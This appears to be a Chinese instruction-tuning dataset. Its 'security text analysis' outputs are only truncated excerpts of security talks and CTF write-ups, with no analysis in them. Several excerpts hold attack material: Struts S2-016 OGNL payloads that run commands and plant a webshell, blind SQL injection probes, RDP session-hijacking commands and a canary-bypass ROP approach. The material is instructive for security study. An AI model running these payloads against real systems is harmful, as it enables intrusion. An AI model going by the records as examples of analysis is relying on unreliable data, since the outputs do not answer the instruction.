{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Introduction to Network Security Data Visualization Greg Conti 1. Introduction The Internet is teeming with network traffic, usually benign, but occasionally malicious. A recent study by the University of California at Berkeley estimated that 532,897 terabytes of information flowed across the Internet in 2002. Of that figure, approximately 92,000 terabytes were World Wide Web traffic, 440,000 terabytes were original email traffic and 274 terabytes were instant messaging traffic.1 Given an estimate of 1 kilobyte per packet, approximately 533 trillion packets traversed the Internet. While the exact percentage of malicious packets is not known, assuming a conservative estimate of 0.1%, one can estimate the traffic in the hundreds of billions. This figure is clouded by crud from legitimate traffic exhibiting abnormal behavior.2 Traditional intrusion detection systems use algorithmically implemented signature and anomoly based techniques to detect attacks. These techniques, while effective, result in an unacceptable amount of false positives and false negatives when confronted with the sheer volume of network activity. In this white paper, I present an approach to augment the algorithmically implemented, traditional signature and anomoly based intrusion detection systems with visualization techniques. This provides multiple benefits:  By their very nature, most zero-day (never seen before) attacks do not match existing intrusion signatures. Visualization techniques can provide clues to impending attacks and facilitate quick response analysis.  Some stealthy attacks are invisible to traditional intrusion detection systems, but are readily visible using appropriate visualizations.  Specific attack tools and exploits have visual fingerprints that can be used to profile attackers.  Visualization techniques can be used that require little state and are remarkably resistant to resource consumption attacks that can incapacitate traditional intrusion detection systems.  Both ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVMProtect的一次奇妙之旅 何潇潇@永信至诚 VMProtect是什么 VMProtect背后的原理 还原VMProtect的方法 演示还原 总结 CONTENTS 8/27/16'2:30PM 2 VMProtect是什么? VMProtect是世界上最强大的二进制代码保护软件之一是由俄 罗斯人开发的至今没有人公开声称对其完全破解 03 8/27/16'2:30PM 2 VMProtect是什么? 01 一个基于堆 栈机的intel指 令的模拟器 02 通过编译,把intel 指令编译成精心 设计的一组虚拟 指令(PCode) 特定的解释引 擎用于解释 执行上述的虚 拟指令 从本质来讲VMProtect是 8/27/16'2:30PM 3 8/27/16'2:30PM 4 相关术语 Intel指令寄存器(Register) 和 VM指令寄存器(VMReg) VMProtect一共有14个寄存 器但是用16个格子(slot)存 放它们有多的2个格子可 以理解成自由寄存器最终 扩展成16个寄存器 8/27/16'2:30PM 5 相关术语 Intel指令(Intel Instruction) 和 VM指令(VMRecord) Intel指令就是Intel的汇编指令 比如 add eax,ecx xor eax,eax  在VMProtect的世界里面指令是由 VMRecord组成的比如 vm_push_imm32 0x1 vm_get_context_dword slot_offset Intel指令编译生成对应的一组VMRecord 比如 mov ecx,eax; vm_get_context_dword vEax vm_save_context_dword vEcx 8/27/16'2:30PM 6 相关术语 Intel函数基本块(BasicBlock) 和 VM基本块(VMBlock) BasicBlock是组成Intel函数控制 流图的基本单位在VMProtect 里面,VMBlock和它一一对应的 只不过VMBlock是VMRecord的 载体而且基本块与基本块之间 的关系(也就是控制流图CFG) 也在VMBlock之间一一对应 8/27/16'2:30PM 7 VMProtect背后的原理 8/27/16'2:30PM 7 逻辑门运算 VMProtect是通过NOR(或非门)和ADD(加法门)来实现intel指令的等价运算 NOR(a,b) = NOT(OR(a,b)) = AND(NOT(a),NOT(b)) 有了NOR的操作就很容易表示其他的运算,例如: NOT(a) = NOR(a,a) AND(a,b) = NOR(NOT(a),NOT(b)) = NOR(NOR(a,a),NOR(b,b)) OR(a,b) = NOR(NOR(a,b),NOR(a,b)) XOR(a,b) = NOR(NOR(a,b),NOR(NOR(a,a),NOR(b,b))) SUB(a,b) = NOR(ADD(NOR(a,a),b),ADD(NOR(a,a),b)) 比如VMRecord来表示and eax,ecx VMProtect背后的原理 8/27/16'2:30PM 8 指令集可以理解成线性空间寄存器就是空间的基寄存器个数也就是空间 的维数指令集中的指令可以理解成算子比如intel里面的add,xor,or等 在这里,intel指令集空间维度是9VMProtect的是16所以注定这2个空间不 同构 从intel指令到VMProtect指令的变换f是同态变换也就是这种变换没有逆 变换从理论上面证明了不存在完全还原方法 映射 VMProtect背后的原理 8/27/16'2:30PM 9 具体原因是VMProtect的寄存器16个格子里面任何时刻都有2个格子是 自由的(其实是3个,因为vEex是垃圾寄存器,也是自由的) VMProtect当一个 寄存器发生变化的时候它不会把新的值保存在原来的那个格子里面它会 从空闲格子里面取一个出来保存新值比如vEax 开始存放在1号格子里面 经过一系列运算vEax值发生变化需要更新这时会从空闲格子里面随机 取出一个比如(2号格子)用来存放vEax,原来的1号格子就会进入空闲池子里 了正是这种特性造成了Intel指令到VM指令之间不可能是一一对应的关 系因为操作数也就是VMProtect用到的格子时刻都在随机变化只有 VMProtect自己知道对应关系除了它本身第三者很难知道 VMProtect背后的原理 8/27/16'2:30PM 10 还是and eax,ecx 通过变换f生成了上面的VMRecords 比如vEax开始保存在1号格子里面经过and运算以后保存最后结果的 时候从空", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nwww.synack.com @colbymoore @patrickwardle optical surgery; implanting a dropcam colby moore / patrick wardle Synack Colby Moore (vrl/synack) Patrick Wardle (nasa/nsa/vrl/synack) Synacks R&D team who we are > an outline overview root access vulnerabilities implant an overview what/why? Dropcam is a cloud-based Wi-Fi video monitoring service with free live streaming, two-way talk and remote viewing that makes it easy to stay connected with places, people and pets, no matter where you are. (dropcam.com) cloud recording night vision two-way talk intelligent alerts > setup or > a target got a target on your back?! extremely popular found in interesting locations useful capabilities rooting a dropcam popping one of these # > probing some portz exposed 3.3v UART breakout board (FTDI serial to USB) serial connection (pin 3 & 4) > and action! password prompt $ screen /dev/tty.usbserial-A603NJ6C 115200 [0.000000] Linux version 2.6.38.8 (dropcambuild@linux-ws) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) ) [0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f [0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache ! ... ! ! ! .::. .o0WMMMMMNOc. lk, dWMMMMNXNMMMMWl .NMc dMMMMd. .kMMMMl .oOXNX0kWMc cX0xXNo .oOXNX0d' .0XxxKNNKx; :kKNNKx. .lOXNNKx, :XXxKNXOldKNNKd. KMMMO KMMM0 lWNd;',lXMMc oMMo'..dWNo,',oXWx .WMWk;',c0M0. .KMO:'':; ;NWx;',cKMK. lMMx'.oWMX;.'0MO OMMMW; cWMMMx .MM: .WMc oMX 'MM, 'WM;.WMd XMo kM0 KMx .WMd lMM' .XMo cMX .0MMMM0..cKMMMMk 0M0' .dMMc oMX .XMk' .xMX..WMK; .lWW, cWW: dMX, .oMMd lMM' .XMo cMX :XM0:dNMMMMO; oNMNKXMNWMc oMX .dNMNKXMNx. .WMWMNKXMWO' ;0WWKKWN, cKMNKXWWWMd lMM' .XMo cMK ;.0MMMMO, .;:;. ';. .;. .;:;. .WMo.,:;'. .,::,. .;:;'..;. .;; ,;. .;. 'ONx' .WM: .. ! Ambarella login: > accessing the bootloader bootloader $ screen /dev/tty.usbserial-A603NJ6C 115200 ! ___ ___ _________ _ / _ \\ | \\/ || ___ \\ | | / /_\\ \\| . . || |_/ / ___ ___ | |_ | _ || |\\/| || ___ \\ / _ \\ / _ \\ | __| | | | || | | ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n07/04/2008 1 Speakers: Chema Alonso José Parada Informática64 Microsoft MS MVP Windows Security IT Pro Evangelist chema@informatica64.com jparada@microsoft.com Agenda Code Injections What are Blind Attacks? Blind SQL Injection Attacks Tools Time-Based Blind SQL Injection Tools Time-Based Blind SQL Injection using heavy queries Demos Marathon Tool 07/04/2008 2 Code Injection Developer dont sanitize correctly the input parameters and use them in queries directly: Command Injection SQL Injection LDAP Injection Xpath Injection Blind Attacks Attacker injects code but cant access directly to the data. However this injection changes the behavior of the web application. Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data. 07/04/2008 3 Blind SQL Injection Attacks Attacker injects: True where clauses False where clauses Ex: Program.php?id=1 and 1=1 Program.php?id=1 and 1=2 Program returns not any visible data from database nor data in error messages either. The attacker cant see any data extracted from the database. Blind SQL Injection Attacks Attacker analyzes the response pages looking for differences between True-Answer Page and False- Answer Page: Different hashes Different html structure Different patterns (keywords) Different linear ASCII sums Different behavior By example: Response Time 07/04/2008 4 Example: True-Answer Page Example: False-Answer Page 07/04/2008 5 Blind SQL Injection Attacks If any difference exist, then: Attacker can extract all information from database How? Using booleanization MySQL: Program.php?id=1 and 100>(ASCII(Substring(user(),1,1))) True-Answer Page or False-Answer Page? MSSQL: Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1))) from sysusers) Oracle: Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1))) from all_users where rownum<=1) Blind SQL Injection Attacks: Tools SQLbfTools: Extract all information from MySQL databases us", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"PGTKSH\" \"1\" \"2003-11-02\" \"Application\" \"PostgreSQL Client Applications\" .SH NAME pgtksh \\-\\- PostgreSQL Tcl/Tk shell 客户端 .SH SYNOPSIS .sp pgtksh [filename [argument...]] .SH \"DESCRIPTION 描述\" .PP \\fBpgtksh\\fR 是一个带有 PostgreSQL 数据库访问函数扩展的 Tcl/Tk shell 接口实际上它是装载了 libpgtcl 的wish 和普通的 Tcl/Tk shell wish 类似命令行的第一个参数是一个脚本文件 任何剩余的参数都传递给该脚本特殊的选项可以由 X Window 系统库来处理 如果没有命名脚本的名字那么该 shell 是交互的 .PP 一个带有 PostgreSQL 函数的纯 Tcl shell 是 \\fBpgtclsh\\fR(1) .SH \"SEE ALSO 参见\" .PP \\fBpgtclsh\\fR(1), 描述了 libpgtcl, \\fBtclsh\\fR(1), \\fBwish\\fR(1) .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzz 大法之挖掘潜在的逻辑越权 AuthorVulkey_Chen Bloggh0st.cn 小密圈Web 安全 SzS 对一个网站做测试的时候发现了这样一条请求 这条请求返回的信息是个人信息用户 ID手机号密码 {\"responseData\":{\"userid\":\"用户 id\",\"login\":\"用户名\",\"password\":\"密码\",\"mobilenum\":\"手机号 \",\"mobileisbound\":\"01\",\"email\":null}} 一开始的想法是变为 GET 请求可行然后增加 JSONP 劫持的回调参数失败 之前也有人问我怎么去做参数字典的收集 A. 注意网站参数的命名方式 大写英文 B. 返回变参数注意值都为 B 用户 也就是你需要准备两个用户 上面所述的返回信息中包含了很多参数可生成如下 userid=B 用户 id login=B 用户名 password=B 用户密码 mobilenum=B 用户手机号 email=B 用户邮箱 C. 整合 A 规则+B 收集=C 整合 最后变成如下的字典 USERID=B 用户 id LOGIN=B 用户名 PASSWORD=B 用户密码 MOBILENUM=B 用户手机号 EMAIL=B 用户邮箱 然后 Burp Intruder 模块开启导入字典(这里将参数设在 POST 请求正文)Start Fuzz 测试结果发现使用 LOGIN 参数可以成功的从 A 用户的个人信息越权获取到 B 用户的个人信 息", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSomerset Recon Infecting the Embedded Supply Chain Zach Miller Alex Kissinger Somerset Recon Introduction - Who We Are Zach:  Reverse Engineering, Pen Testing  Twitter: @bit_twidd1er Alex:  Barista that occasionally does security things @ Somerset Recon  Cappuccinos, Hardware Hacking, Reverse Engineering Somerset Recon Introduction - Somerset Recon  @SomersetRecon  https://somersetrecon.com/contact Somerset Recon Previous Research - Electronic Safe Lock Analysis  Discovered vulnerabilities in the mobile application and wire protocol of the SecuRam Prologic B01 Bluetooth electronic safe lock  Capture and decode PIN numbers transmitted wirelessly  Brute force PIN numbers over the wire Somerset Recon Previous Research - Hello Barbie  Security analysis on the Mattel Hello Barbie doll  Identified several vulnerabilities affecting the device and associated web and mobile technologies Somerset Recon These are all embedded devices Somerset Recon Where are embedded devices? Embedded General Purpose ??? Somerset Recon Industries Develop Embedded Devices  Automotive  Industrial  Medical  Communications  Digital Consumer  Etc. Somerset Recon What do these embedded devices have in common??? Somerset Recon They all utilize embedded debuggers for their development Somerset Recon Our Targets Somerset Recon Our Targets Somerset Recon Segger J-Link Debug Probe  JTAG/SWD/SWO/etc.  In Circuit Emulator (ICE)  In Circuit System Programmer (ICSP)  Supports ARM/ARM Cortex, RISC-V, RX targets  USB and Ethernet  Cross platform toolchain  Ultrafast download/upload to flash  Unlimited software breakpoints SEGGER J-Links are the most widely used line of debug probes available today- www.segger.com Somerset Recon Segger Software  J-Link Software Package  J-Link GDB Server RTOS Plugin SDK  SystemView - Real-time Analysis and Visualization  Ozone Graphical Debugger  J-Scope Data Analysis and Visualization Tool  Much more... We focused on the J-Link Software Package Somerset Recon J-Link Software A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProxyLogon is Just the Tip of the Iceberg A New Attack Surface on Microsoft Exchange Server! Orange Tsai USA 2021 Orange Tsai  Orange Tsai, focusing on Web and Application 0-day research  Principal Security Researcher of DEVCORE  Captain of HITCON CTF Team  Speaker of Security Conferences  Black Hat USA & ASIA / DEFCON / HITB / HITCON   Selected Awards and Honors:  2017 - 1st place of Top 10 Web Hacking Techniques  2018 - 1st place of Top 10 Web Hacking Techniques  2019 - Winner of Pwnie Awards \"Best Server-Side Bug\"  2021 - Champion and \"Master of Pwn\" of Pwn2Own Disclaimer All vulnerabilities disclosed today are reported responsibly and patched by Microsoft Why Target Exchange Server? 1. Mail servers always keep confidential secrets and Exchange Server is the most well-known mail solution for enterprises and governments worldwide 2. Has been the target for Nation-sponsored hackers for a long time (Equation Group) 3. More than 400,000 Exchange servers exposed on the Internet according to our survey Exchange Security in the Past Years  Most bugs are based on known attack vectors but there are still several notable bugs: 1. EnglishmansDentist from Equation Group:  Recap: A only practical and public pre-auth RCE in the Exchange history. Unfortunately, the arsenal only works on an ancient Exchange Server 2003 2. CVE-2020-0688 Hardcoded MachineKey from anonymous working with ZDI:  Recap: A classic .NET deserialization bug due to a hardcoded cryptography key. This is also a hint shows Microsoft Exchange is lacking of security reviews Our Works  We focus on the Exchange architecture and discover a new attack surface that no one proposed before. That's why we can pop 0days easily!  We discovered 8 vulnerabilities that covered server-side, client-side, and crypto bugs through this new attack surface, and chained into 3 attacks: 1. ProxyLogon: The most well-known pre-auth RCE chain 2. ProxyOracle: A plaintext-password recovery attacking chain 3. ProxyShell: The pre-auth RCE ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1563-002-win-远程服务会话劫持-RDP劫持 ## 来自ATT&CK的描述 攻击者可能会劫持合法用户的远程桌面会话用以在内网环境中横向移动远程桌面是操作系统中的常见功能它允许用户使用远程系统上的系统桌面图形用户界面登录到交互式会话Microsoft 将其远程桌面协议 (RDP) 的实现称为远程桌面服务 (RDS) 攻击者可能会进行RDP会话劫持包括窃取合法用户的远程会话通常情况下当别人试图窃取他们的会话时用户会得到通知通过系统权限和使用终端服务控制台c:\\windows\\system32\\tscon.exe[要窃取的会话号码]攻击者可以劫持一个会话而不需要凭证或提示用户这可以在远程或本地进行也可以在活动或断开的会话中进行 它还可以通过窃取域管理员或更高权限的帐户会话来导致远程系统发现和权限提升所有这些都可以通过使用本机Windows命令来完成但它也已作为红队工具中的一项能力 ## 测试案例 ### 测试1 RDP hijacking RDP劫持--如何透明地劫持RDS和RemoteApp会话以便在内网中移动 测试命令用命令提示符运行 需要提升等级如root或admin ``` query user sc.exe create sesshijack binpath= \"cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}\" net start sesshijack ``` Session_ID1337 Destination_IDrdp-tcp#55 清除命令 ``` sc.exe delete sesshijack >nul 2>&1 ``` ## 检测日志 windows 安全日志Windows sysmon日志 ## 测试复现 ### 测试1 RDP hijacking ``` C:\\Users\\Administrator.ZHULI>query user 用户名 会话名 ID 状态 空闲时间 登录时间 >administrator console 1 运行中 无 2022/1/13 16:10 C:\\Users\\Administrator.ZHULI>sc.exe create sesshijack binpath= \"cmd.exe /k tscon 1 /dest:1\" [SC] CreateService 成功 C:\\Users\\Administrator.ZHULI>net start sesshijack 服务没有响应控制功能 请键入 NET HELPMSG 2186 以获得更多的帮助 ``` 由于测试样机无RDP登陆会话故测试未成功复现 ## 测试留痕 ### 测试1 RDP hijacking ``` Process Create: RuleName: technique_id=T1059,technique_name=Command-Line Interface UtcTime: 2022-01-13 08:17:07.755 ProcessGuid: {78c84c47-e003-61df-3f01-000000000900} ProcessId: 2640 Image: C:\\Windows\\System32\\sc.exe FileVersion: 10.0.17763.1 (WinBuild.160101.0800) Description: Service Control Manager Configuration Tool Product: Microsoft Operating System Company: Microsoft Corporation OriginalFileName: sc.exe CommandLine: sc.exe create sesshijack binpath= \"cmd.exe /k tscon 1 /dest:1\" CurrentDirectory: C:\\Users\\Administrator.ZHULI\\ User: ZHULI\\Administrator LogonGuid: {78c84c47-de8c-61df-d399-0a0000000000} LogonId: 0xA99D3 TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# S2-016 Remote Code Execution Vulnerablity [中文版本(Chinese version)](README.zh-cn.md) Affected Version: 2.0.0 - 2.3.15 Details: - http://struts.apache.org/docs/s2-016.html - http://www.freebuf.com/articles/web/25337.html ## Setup ``` docker compose build docker compose up -d ``` ## Exploit Visit `http://your-ip:8080/index.action?redirect:OGNL expression` to execute an OGNL expression. Execute `uname -a`: ``` redirect:${#context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,#f=#_memberAccess.getClass().getDeclaredField(\"allowStaticMethodAccess\"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec(\"uname -a\").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()} ``` Get web directory: ``` redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#ot=#resp.getWriter (),#ot.print('web'),#ot.print('path:'),#ot.print(#req.getSession().getServletContext().getRealPath('/')),#ot.flush(),#ot.close()} ``` Get webshell ``` redirect:${#context[\"xwork.MethodAccessor.denyMethodExecution\"]=false,#f=#_memberAccess.getClass().getDeclaredField(\"allowStaticMethodAccess\"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletRequest\"),#b=new java.io.FileOutputStream(new java.lang.StringBuilder(#a.getRealPath(\"/\")).append(@java.io.File@separator).append(\"1.jspx\").toString()),#b.write(#a.getParameter(\"t\").getBytes()),#b.close(),#genxor=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\").getWriter(),#genxor.println(\"BINGO\"),#genxor.flush(),#genxor.close()} ``` Result: ![](01.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDoS: Denial Of Shopping Analyzing and Exploiting (Physical) Shopping Cart Immobilization Systems by Joseph Gabay A Disclaimer This talk is the result of my personal project. Any views, opinions, or research presented in this talk are personal and belong solely to me. They do not represent or reflect those of any person, institution, or organization that I may or may not be associated with in a professional or personal capacity unless explicitly stated otherwise. Who are you? Who are you? And how did you get in here? Joseph Gabay Joseph Gabay Hacker, Maker, Flat Mooner, Collector of Silly Domain Names and Random Certifications. I also build robots sometimes. Wait, shopping cart whatnows?  Invisible fence, for carts.  No, really.  Shopping cart locks when taken out of parking lot  Other, more niche applications  Stopping runouts  Gatekeeper Systems estimates $180 million in annual shopping cart theft Okay, but why shopping cart wheels? Or, a brief ramble about hacking. It's not worth doing something unless someone, somewhere, would much rather you weren't doing it. - Sir Terry Pratchett GNU Terry Pratchett How do they work?  Magnetic Loop System  Underground perimeter wire sends out signal  Current through wire produces magnetic field  Cart senses field, locks using internal mechanism  Store staff has remote that can unlock carts Anatomy of a Shopping Cart Wheel - Locking Mechanism Anatomy of a Shopping Cart Wheel - Locking Mechanism Mechanism expands/contracts inner ring Anatomy of a Shopping Cart Wheel - Locking Mechanism Mechanism expands/contracts inner ring Ridges on inner ring lock into ridges inside wheel casing Anatomy of a Shopping Cart Wheel - Internal View  3V Lithium Battery  µC likely optimized for low power consumption  DC Motor  Drives gearbox to expand/contract ring  PCBa hosts radios and microcontroller 3V Lithium Battery Motor PCB Assembly Anatomy of a Shopping Cart Wheel - PCBa  2 Separate Antennas  2.4G - PCB Trace  7.8K - Inductor  TI CC2510 Microcont", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVeil%Pillage:** Post%Exploitation*2.0* Will$$ @harmj0y* Veris$Group$$Adaptive$Threat$Division$ $*whoami*  Security$researcher$and$pentester/red$teamer$ for$Veris$Groups$Adaptive$Threat$Division$$  Co?founder$of$the$Veil?Framework$#avlol$  www.veil?framework.com$  Shmoocon'14:'AV$Evasion$with$the$Veil$ Framework$  co?wrote$Veil?Evasion,$wrote$Veil?Catapult,$Veil? PowerView,$and$PowerUp$ $  Active$Cortana,$Powershell,$and$NovaHacker!$ tl;dr*  The$Veil?Framework$  Post$Exploitation;$redux$  Veil?Pillage$  Current$Module$Overview$  Hashdumping$and$Plaintext$Creds$  Demos$  KB$2871997$(Microsoft$PTH$fix?)$  Module$Releases$and$Development$  Recap$ The*Veil%Framework* How$We$Got$Here$ Background*  Started$with$the$May$2013$release$of$ Veil,$later$renamed$to$Veil?Evasion$  Utilizes$various$languages$and$ techniques$to$generate$AV?evading$ payloads$  shellcode$injection$and$pure$meterpreter$ stagers$  Debuted$at$Shmoocon$14:$AV$Evasion, with,the,Veil$Framework,  https://www.veil?framework.com/$ How*We*Got*Here*  After$dealing$with$AV?evasion,$focus$ moved$to$payload$delivery$  Wanted$a$way$to$trigger$backdoors$on$ target$boxes$in$a$stealthy$way$  Released$at$Shmoocon'14,$Veil? Catapult$can$upload/host$and$execute$ binaries,$as$well$as$few$other$common$ tricks$ The*Attack*Cycle* Recon$ Enumeration$ Exploitation$ Post? exploitation$ Post%Exploitation;*Redux* Identify$points$that$affect$business$impact$ Datamine$for$Sensitive$Information$ Establish$Persistence$ Acquire$Domain/Network$Administrative$Privileges$ Identify$Further$Exploit$Points$ Escalate$Privileges$ Gain$Situational$Awareness$ Gain$Access$Through$Exploit$ Post%Exploitation;*English*  If$you$have$access$and/or$credentials$for$ one$or$more$machines$on$a$network,$ what$can$you$do?$  Example:'say$you$have$a$local$ administrator$hash$for$remote$hosts,$ and$want$to$grab$plaintexts$of$other$ logged$on$users$on$those$hosts?$ Post%Exploitation;*Today*  Option'#1:'PSEXEC$to$a$box$with$ Metasploit,$then$getsystem/wdigest$  Ad", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n! ! Sentient&Storage:&& Do&SSDs&have&a&mind&of&their&own?& ! ! ! ! ! ! ! ! ! Tom!Kopchak! Kopchak! ! 2! Table&of&Contents& Abstract!.................................................................................................................................................!8! Introduction!..........................................................................................................................................!9! Purpose!...............................................................................................................................................!10! Literature!Review!................................................................................................................................!12! Challenges!...........................................................................................................................................!20! Overview!of!Storage!Architecture!.......................................................................................................!22! Magnetic!Hard!Drives!......................................................................................................................!22! Solid!State!Drives!............................................................................................................................!24! Flash!Memory!..............................................................................................................................!24! Controllers!...................................................................................................................................!27! Evidence!Collection!.............................................................................................................................!30! Methodology!.......................................................................................................................................!31! Materials!.................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## rhinoxorus (pwn, 500p, ? solves) Dostajemy program i analizujemy go. Po uruchomieniu wczytuje on zawartość pliku password.txt do zmiennej globalnej, i zaczyna nasłuchiwać na porcie 24242 i forkuje się dla każdego połączenia. Każdy fork wczytuje 256 bajtów od usera i wywołuje jakąś funkcję z globalnej tablicy funkcji: ``` bytes_read = recv(sockfd, recv_buf, (unsigned int)BUF_SIZE, 0); if (bytes_read > 0) func_array[recv_buf[0]](recv_buf, (unsigned int)bytes_read); ``` Każda z funkcji jest podobna, i wygląda mniej więcej tak: ``` unsigned char func_32(unsigned char *buf, unsigned int count) { unsigned int i; unsigned char localbuf[0x84]; // stała 0x84 jest różna dla każdej funkcji w tablicy unsigned char byte=0x84; // stała 0x84 jest różna dla każdej funkcji w tablicy memset(localbuf, byte, sizeof(localbuf)); printf(\"in function func_32, count is %u, bufsize is 0x84\\n\", count); if (0 == --count) return 0; for (i = 0; i < count; ++i) localbuf[i] = buf[i]; func_array[localbuf[0]](localbuf+1, count); return 0; } ``` Od razu widać że łatwo wywołać przepełnienie bufora, ale niestety - stos jest chroniony kanarkami więc nie będzie tak łatwo. W kodzie widać też nieużywaną nigdzie funkcję socksend która wysyła podany w argumencie bufor do podanego w argumencie socketa. Po chwili zastanowienia dochodzimy do wniosku że możemy pominąć kanarka po prostu xorując go z zerami. Następnie jedyne co musimy zrobić, to nadpisać adres powrotu w odpowiedni sposób, tak żeby wywołać funkcję socksend z parametrami socksend(fd, password, BUF_SIZE) (w ten sposób program sam wyśle do nas flagę). Niestety nie jest tak prosto, na stosie nie ma wystarczająco wiele miejsca żeby zmieścic argumenty dla funkcji socksend (po nadpisaniu zmiennej 'counter' kończy się wykonanie funkcji). Ale jeśli postaramy się, możemy przeskoczyć do ramki funkcji niżej. Używamy do tego następującego gadgetu: ``` gadget_pop: add esp, 0Ch ; pominięcie 3 elementów na stosie pop ebx ; zdjęcie elementu ze stosu (i zapisanie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Patience (RE, 769p) This was a haskell reversing challenge. If this doesn't fill you with dread, this means that probably either: - you are most 1338 pr0 xakep r3v3rse engineer ever living - you don't comprehend the amount of horror that you're going to witness. Either way, you're in for some serious fun. In fact, I've never seen anyone actually reverse engineer (non-trivial) haskell binary before - most challenges are actually solved with black-box workarounds or other side channels. This task is no different - we are given .cmm file along with compiled binary. CMM files are dump of late-stage intermediate language from GHC. This is going to make our life way easier - we don't have to reverse haskell thunks, we have everything in plain text... well, sort of. ## How to be lazy A word of introduction to the beautiful world of functional programming. Haskell is a lazy language. But not just your average slightly-procrastinating kind - everything is delayed as long as it possibly can be, and I mean it. For example, consider this function: ```haskell integers n = n : integers (n+1) ``` if you don't speak Haskell, this is conceptually equivalent to following python code: ```python def integers(n): return [n] + integers(n + 1) ``` Do you see anything wrong with this code? Exactly, this is not a terribly useful function - it'll recurse forever, or rather eat all your available stack space and explode. Not in Haskell though - you can call this function, take first 100 elements of the result, and get perfectly useful result - haskell is *lazy*, so only necessary elements will be evaulated. But this still doesn't explain just how lazy Haskell is. Consider this: ```haskell foo (2 + 2) ``` This is just invoaction of function `foo` with parameter `4`. Wait, wrong, I lied to you. The parameter is `2 + 2`, and it's not actually evaluated until it's needed. Hell, you could've passed `1 / 0` and nothing bad would happen, at least until something actually evaulates the parameter. #", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIncreasing the security of your election by fixing it Daniel C. Silverstein Damon McCormick dans@csua.berkeley.edu damonmcc@uclink.berkeley.edu Part One: Disaster Strikes The 2000 US Presidential Election led many to question the accuracy of paper ballot systems Several companies seized on this opportunity to promote electronic voting systems:  Election Systems & Software  Diebold Election Systems  Hart InterCivic  Sequoia Voting Systems  ...three independent but redundant memory paths ensure that no votes will ever be lost or altered. [1]  ...World-class encryption techniques utilized to store election results. [2]  Proprietary firmware on closed system prevents hacker access. [3] Lofty Promises Made  Trust Us!  We know what were doing!  Of course we don't have bugs!  Don't have security holes either!  And, even if we did, (which we dont) nobody could ever actually exploit them The Message? And so, Democracy was made safe from evil hackers The End If it looks like snake oil... And it smells like snake oil... And it tastes like snake oil... Its probably snake oil [4] Or Not Q: Whats the first thing you do after rooting a box? Q: Whats the second thing you do after rooting a box? Pop Quiz 1 A: Hide your presence A: Patch the hole you came in through (so nobody else can use it) Q: How do you tell that someone rooted your box? Pop Quiz 2 A: Good question! Forensics analysis is hard! You can't trust information from a compromised machine. Q: How do you tell that someone tampered with the electronic voting machine you just used to vote? A: You dont Pop Quiz 3  The major commercial electronic voting machines do not produce a voter verifiable paper trail  Though, thanks in part to the work of David Dill [5], some of the vendors are testing prototypes that do  Without a paper trail, thre is no way to detect tampering No Paper Trail  The major commercial electronic voting systems are proprietary platforms, protected as trade secrets  Members of the security community at large ca", "category": "text_analysis", "source": "security_papers"}
